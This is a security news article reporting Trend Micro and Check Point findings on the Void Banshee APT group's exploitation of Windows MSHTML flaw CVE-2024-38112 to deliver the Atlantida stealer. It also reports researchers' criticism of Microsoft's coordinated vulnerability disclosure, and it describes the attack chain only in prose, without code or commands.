Void Banshee APT exploited “lingering Windows relic” in zero-day attacks
The zero-day exploit used to leverage CVE-2024-38112, a recently patched Windows MSHTML vulnerability, was wielded by an APT group dubbed Void Banshee to deliver malware to targets in North America, Europe, and Southeast Asia, threat hunters with Trend Micro’s Zero Day Initiative have shared.
How Void Banshee used CVE-2024-38112
As previously explained by Check Point researcher Haifei Li, the attackers used files that were specially crafted to exploit the vulnerability but were made to look like PDFs.
“The threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines,” Trend Micro researchers noted.
“This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware.”
The attack chain (Source: Trend Micro)
The threat actors used spear-phishing tactics to direct targets to ZIP files containing copies of books in PDF format, along with malicious files disguised as PDFs. The ZIP files were hosted on online libraries, cloud sharing sites, Discord, and compromised websites.
“Some PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference material such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and students who often use reference materials and places where digital copies of books are collected,” the threat hunters say.
Victims thought that they were opening PDF files, but were actually executing an internet shortcut file that exploited to flaw to trigger the remnants of Internet Explorer browser to lead to a compromised website that hosted a malicious HTML Application.
The HTA file contained a Visual Basic Script that used PowerShell to download an additional script and execute it, create a new process for it, download additional trojan loaders and, finally, deliver the Atlantida stealer.
“[The stealer] targets sensitive information from various applications, including Telegram, Steam, FileZilla, various cryptocurrency wallets, and web browsers. This malware focuses on extracting stored sensitive and potentially valuable data, such as passwords and cookies, and it can also collect files with specific extensions from the infected system’s desktop,” they noted.
“Moreover, the malware captures the victim’s screen and gathers comprehensive system information. The stolen data is then compressed into a ZIP file and transmitted to the attacker via TCP.”
According to Check Point, Void Banshee have been exploiting CVE-2024-38112 for over a year.
“The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide,” Trend Micro threat hunters noted.
“Since services such as IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows users. Furthermore, the ability of threat actors to access unsupported and disabled system services to circumvent modern web sandboxes such as IE mode for Microsoft Edge highlights a significant industry concern.”
Microsoft failing at coordinated vulnerability disclosure
Both Check Point and Trend Micro researchers noticed the exploitation of CVE-2024-38112 in mid-May 2024 and disclosed their findings to Microsoft. Microsoft released fixes for the vulnerability on July 2024 Patch Tuesday that make it so that MHTML can no longer be used inside internet shortcut files (.url), and credited the former in the vulnerability’s security advisory.
But both companies were surprised when Microsoft released the fixes without a heads-up to them.
“This is not the first time [Microsoft] telling us they’re going to patch the issue in month X but released the patch earlier without notifying us,” Li said, and noted that “coordinated disclosure can’t be just one-side coordination.”
Dustin Childs, head of threat awareness at the ZDI, pointed out other instances of researchers complaining about Microsoft’s lack of communication, and pointed out that making the coordinated vulnerability disclosure (CVD) process frustrating for researchers could have negative consequences for Microsoft.
“If you don’t offer a bounty payout and don’t coordinate with researchers or properly credit them, why in the world would anyone report bugs to you?” he asked.
For coordinated vulnerability disclosure to work, both parties – vendors and researchers – have certain responsibilities, he pointed out, and “it’s time to have the vendors step up and do theirs.”